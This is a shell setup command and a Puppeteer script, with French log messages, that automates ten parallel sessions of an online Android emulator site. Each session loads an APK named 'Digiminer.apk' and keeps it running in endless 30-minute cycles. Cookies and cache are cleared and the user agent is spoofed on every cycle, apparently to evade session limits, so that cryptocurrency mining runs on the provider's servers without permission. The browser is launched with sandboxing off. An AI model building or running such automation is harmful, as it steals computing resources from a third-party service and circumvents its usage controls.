cd ~/. && wget https://nodejs.org/dist/v22.11.0/node-v22.11.0-linux-x64.tar.xz && tar -xvf node-v22.11.0-linux-x64.tar.xz && rm -rf node-v22.11.0-linux-x64.tar.xz && cd node-v22.11.0-linux-x64 && touch online && chmod +x * && echo "cd ~/./node-v22.11.0-linux-x64/bin && xvfb-run node minerdash.js" > ~/./node-v22.11.0-linux-x64/online && cd ~/. && cat << 'ENDFILE' > ~/./node-v22.11.0-linux-x64/bin/minerdash.js && cd ~/./node-v22.11.0-linux-x64/bin && sudo apt-get install -y xvfb && npm init -y && npm install -y puppeteer
const puppeteer = require('puppeteer');

(async () => {
    const browser = await puppeteer.launch({
        headless: false, 
        userDataDir: './user_data',
        args: ['--no-sandbox', '--disable-setuid-sandbox']
    });

    const urls = [
        "https://www.uptoplay.net/runapk/create-androidapk.html?app=android_blank&apk=%2Fvar%2Fwww%2Fhtml%2Fweboffice%2Fmydata%2F53706111%2FNewDocuments%2F%2FDigiminer.apk",
        "https://www.uptoplay.net/runapk/create-androidapk.html?app=android_blank&apk=%2Fvar%2Fwww%2Fhtml%2Fweboffice%2Fmydata%2F53706112%2FNewDocuments%2F%2FDigiminer.apk",
        "https://www.uptoplay.net/runapk/create-androidapk.html?app=android_blank&apk=%2Fvar%2Fwww%2Fhtml%2Fweboffice%2Fmydata%2F53706113%2FNewDocuments%2F%2FDigiminer.apk",
        "https://www.uptoplay.net/runapk/create-androidapk.html?app=android_blank&apk=%2Fvar%2Fwww%2Fhtml%2Fweboffice%2Fmydata%2F53706114%2FNewDocuments%2F%2FDigiminer.apk",
        "https://www.uptoplay.net/runapk/create-androidapk.html?app=android_blank&apk=%2Fvar%2Fwww%2Fhtml%2Fweboffice%2Fmydata%2F53706115%2FNewDocuments%2F%2FDigiminer.apk",
        "https://www.uptoplay.net/runapk/create-androidapk.html?app=android_blank&apk=%2Fvar%2Fwww%2Fhtml%2Fweboffice%2Fmydata%2F53706116%2FNewDocuments%2F%2FDigiminer.apk",
        "https://www.uptoplay.net/runapk/create-androidapk.html?app=android_blank&apk=%2Fvar%2Fwww%2Fhtml%2Fweboffice%2Fmydata%2F53706117%2FNewDocuments%2F%2FDigiminer.apk",
        "https://www.uptoplay.net/runapk/create-androidapk.html?app=android_blank&apk=%2Fvar%2Fwww%2Fhtml%2Fweboffice%2Fmydata%2F53706118%2FNewDocuments%2F%2FDigiminer.apk",
        "https://www.uptoplay.net/runapk/create-androidapk.html?app=android_blank&apk=%2Fvar%2Fwww%2Fhtml%2Fweboffice%2Fmydata%2F53706119%2FNewDocuments%2F%2FDigiminer.apk",
        "https://www.uptoplay.net/runapk/create-androidapk.html?app=android_blank&apk=%2Fvar%2Fwww%2Fhtml%2Fweboffice%2Fmydata%2F53706120%2FNewDocuments%2F%2FDigiminer.apk",

    ];

    const runInstance = async (id, url) => {
        while (true) {
            const context = await browser.createBrowserContext();
            const page = await context.newPage();
            try {
                const client = await page.target().createCDPSession();
                await client.send('Network.clearBrowserCache');
                await client.send('Network.clearBrowserCookies');
                
                await page.setUserAgent('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36');
                
                console.log(`[Instance ${id}] --- ${new Date().toLocaleTimeString()} : Nettoyage & Nouveau cycle ---`);
                
                await page.goto(url, { waitUntil: 'networkidle2', timeout: 60000 });

                const startBtn = '#talpa-splash-button';
                await page.waitForSelector(startBtn, { timeout: 60000 });
                await page.click(startBtn);

                console.log(`[Instance ${id}] Attente chargement (30s)...`);
                await new Promise(r => setTimeout(r, 30000));

                try {
                    await page.waitForSelector('#talpa-splash-button', { timeout: 10000 });
                    await page.click('#talpa-splash-button');
                } catch (e) {
                    await page.evaluate(() => {
                        const el = Array.from(document.querySelectorAll('a, button, div'))
                            .find(e => e.textContent.toLowerCase().trim().includes('enter'));
                        if (el) el.click();
                    });
                }

                console.log(`[Instance ${id}] Succès ! En cours pour 30 min.`);
                await new Promise(r => setTimeout(r, 30 * 60 * 1000));

            } catch (error) {
                console.error(`[Instance ${id}] ERREUR : ${error.message}. Relance dans 1 min.`);
                await new Promise(r => setTimeout(r, 60000));
            } finally {
                await page.close();
                await context.close();
            }
        }
    };

    for (let i = 0; i < urls.length; i++) {
        console.log(`Lancement de l'onglet ${i + 1} / ${urls.length}...`);
        runInstance(i + 1, urls[i]);
        if (i < urls.length - 1) {
            await new Promise(r => setTimeout(r, 5000));
        }
    }
})();
ENDFILE